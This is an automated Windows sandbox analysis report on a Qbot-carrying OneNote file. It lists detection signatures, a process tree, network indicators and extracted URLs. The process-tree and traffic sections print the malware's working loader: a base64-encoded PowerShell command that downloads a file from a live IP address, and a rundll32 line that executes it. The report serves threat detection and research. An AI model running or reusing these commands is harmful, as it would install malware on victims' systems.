Edit tour

Windows Analysis Report
Funds_160151.one

Overview

General Information

Sample Name:	Funds_160151.one
Analysis ID:	800800
MD5:	28e7fc5ae92342890d6544eb123f1b39
SHA1:	8855057b6acb24949315098ace002c99048efd10
SHA256:	2c2e8ec868c8b50a2f7a59d9948a82a9031301dfb7c41651eb35e158fedf190b
Infos:

Detection

Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Qbot

DLL reload attack detected

Malicious sample detected (through community Yara rule)

Sigma detected: Execute DLL with spoofed extension

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Renames NTDLL to bypass HIPS

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Suspicious powershell command line found

Allocates memory in foreign processes

Powershell drops PE file

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

PE file does not import any functions

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

PE file overlay found

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64native

ONENOTE.EXE (PID: 6420 cmdline: C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one MD5: 59056F600C4366EE07277C20A90DAF67)

ONENOTEM.EXE (PID: 5280 cmdline: /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)

cmd.exe (PID: 376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7132 cmdline: powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7252 cmdline: powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); MD5: 04029E121A0CFA5991749937DD22A1D9)

rundll32.exe (PID: 4180 cmdline: rundll32 C:\programdata\gb.jpg,Wind MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 4260 cmdline: rundll32 C:\programdata\gb.jpg,Wind MD5: 889B99C52A60DD49227C5E485A016679)

backgroundTaskHost.exe (PID: 3124 cmdline: C:\Windows\SysWOW64\backgroundTaskHost.exe MD5: F290D12F0351B56708B3DF1EC26CB45B)

ONENOTEM.EXE (PID: 7188 cmdline: "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\1.cmd	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth (Nextron Systems)	0x66:$s3: system.net.webclient).downloadfile('http

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth (Nextron Systems)	0x918fe:$s3: system.net.webclient).downloadfile('http 0xc7896:$s3: system.net.webclient).downloadfile('http
Process Memory Space: powershell.exe PID: 7132	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth (Nextron Systems)	0xb942c:$s3: system.net.webclient).downloadfile('http
Process Memory Space: powershell.exe PID: 7132	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3319:$b2: ::FromBase64String( 0x32025:$b2: ::FromBase64String( 0x3222e:$b2: ::FromBase64String( 0x32e6a:$b2: ::FromBase64String( 0x3a478:$b2: ::FromBase64String( 0x53bca:$b2: ::FromBase64String( 0x5ab9d:$b2: ::FromBase64String( 0x5adab:$b2: ::FromBase64String( 0x5b554:$b2: ::FromBase64String( 0x5b8fd:$b2: ::FromBase64String( 0x5bae6:$b2: ::FromBase64String( 0x858c5:$b2: ::FromBase64String( 0x85ad2:$b2: ::FromBase64String( 0x86437:$b2: ::FromBase64String( 0x8678a:$b2: ::FromBase64String( 0x86b7c:$b2: ::FromBase64String( 0x86f3d:$b2: ::FromBase64String( 0x873d4:$b2: ::FromBase64String( 0x878c3:$b2: ::FromBase64String( 0xbb07e:$b2: ::FromBase64String( 0xbb28b:$b2: ::FromBase64String(

Unpacked PEs

Source	Rule	Description	Author
15.2.rundll32.exe.10000000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
15.2.rundll32.exe.2e6d518.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
15.2.rundll32.exe.2e6d518.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: rundll32 C:\programdata\gb.jpg,Wind, CommandLine: rundll32 C:\programdata\gb.jpg,Wind, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\programdata\gb.jpg,Wind, ProcessId: 4180, ProcessName: rundll32.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source:	Binary string: amstream.pdb source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: e77242d6.dll.15.dr
Source:	Binary string: wntdll.pdb source: e77242d6.dll.15.dr
Source:	Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000C547 FindFirstFileW,FindNextFileW,

15_2_1000C547

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Source: Joe Sandbox View

ASN Name: EXCELLGB EXCELLGB

Source: global traffic

HTTP traffic detected: GET /38199.dat HTTP/1.1Host: 87.236.146.31Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Feb 2023 19:02:06 GMTContent-Type: application/octet-streamContent-Length: 424448Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 1f 00 20 03 00 00 c8 04 00 00 04 00 00 80 13 00 00 00 10 00 00 00 30 03 00 00 00 34 69 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 79 6d 07 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 04 00 35 06 00 00 00 e0 04 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 5c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e1 04 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 1f 03 00 00 10 00 00 00 20 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 00 00 00 00 30 03 00 00 02 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 1c 75 01 00 00 40 03 00 00 76 01 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 ac 03 00 00 00 c0 04 00 00 00 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 35 06 00 00 00 d0 04 00 00 08 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 80 05 00 00 00 e0 04 00 00 06 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 04 00 00 02 00 00 00 aa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 76 aa 01 00 00 00 05 00 00 b0 01 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 5c 1d 00 00 00 b0 06 00 00 1e 00 00 00 5c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835

Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31
Source: unknown	TCP traffic detected without corresponding DNS query: 87.236.146.31

Source: de-ch[1].htm.16.dr	String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.facebook.com (Facebook)
Source: de-ch[1].htm.16.dr	String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.linkedin.com (Linkedin)
Source: de-ch[1].htm.16.dr	String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.twitter.com (Twitter)
Source: de-ch[1].htm.16.dr	String found in binary or memory: "sameAs":["https://www.facebook.com/microsoftschweiz","https://twitter.com/microsoft_ch","https://www.linkedin.com/company/1035","https://www.youtube.com/user/MicrosoftCH","https://www.instagram.com/microsoftch/"] equals www.youtube.com (Youtube)
Source: de-ch[1].htm.16.dr	String found in binary or memory: <a class="d-inline-block" href="https://www.facebook.com/microsoftschweiz" target="_blank" aria-label="Microsoft auf Facebook folgen ( equals www.facebook.com (Facebook)
Source: de-ch[1].htm.16.dr	String found in binary or memory: <a class="d-inline-block" href="https://www.linkedin.com/company/1035" target="_blank" aria-label="Microsoft auf LinkedIn folgen ( equals www.linkedin.com (Linkedin)
Source: de-ch[1].htm.16.dr	String found in binary or memory: <a class="d-inline-block" href="https://www.youtube.com/user/MicrosoftCH" target="_blank" aria-label="Microsoft auf YouTube folgen ( equals www.youtube.com (Youtube)

Source: powershell.exe, 00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp, 1.cmd.7.dr	String found in binary or memory: http://87.236.146.31/38199.dat
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000009.00000002.2662581763.0000021A24B47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000009.00000002.2662581763.0000021A24AE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: de-ch[1].htm.16.dr	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWO4yJ?ver=2ab3"
Source: de-ch[1].htm.16.dr	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWOalS?ver=cc6e"
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: de-ch[1].htm.16.dr	String found in binary or memory: http://schema.org/Organization
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C5D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.2654006199.0000021A0C5FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.office.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://api.scheduler.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://augloop.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cdn.entity.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://cr.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://d.docs.live.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://directory.services.
